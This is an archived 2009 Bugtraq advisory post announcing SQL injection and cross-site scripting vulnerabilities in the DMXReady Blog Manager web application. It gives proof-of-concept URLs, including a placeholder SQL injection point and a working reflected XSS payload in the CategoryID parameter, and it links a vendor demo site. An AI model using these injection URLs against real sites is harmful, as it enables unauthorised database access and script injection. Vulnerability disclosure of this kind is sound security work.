[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200901160933.n0G9Xcb5005494@www3.securityfocus.com>
Date: Fri, 16 Jan 2009 02:33:38 -0700
From: pouya.s3rver@...il.com
To: bugtraq@...urityfocus.com
Subject: DMXReady Blog Manager (SQL/XSS)
#########################################################
---------------------------------------------------------
Portal Name: DMXReady Blog Manager (SQL/XSS)
Vendor : http://www.galaxyscripts.com
Author : Pouya_Server , Pouya.s3rver@...il.com
Aria-Security.Net
Vulnerability : (SQL/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=121&ItemID=[SQL]&action=view
----------
[XSS]:
http://www.site.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer
---------------------------------
Demo:
http://www.demo.dmxready.com/applications/WebBlogManager/
Powered by blists - more mailing lists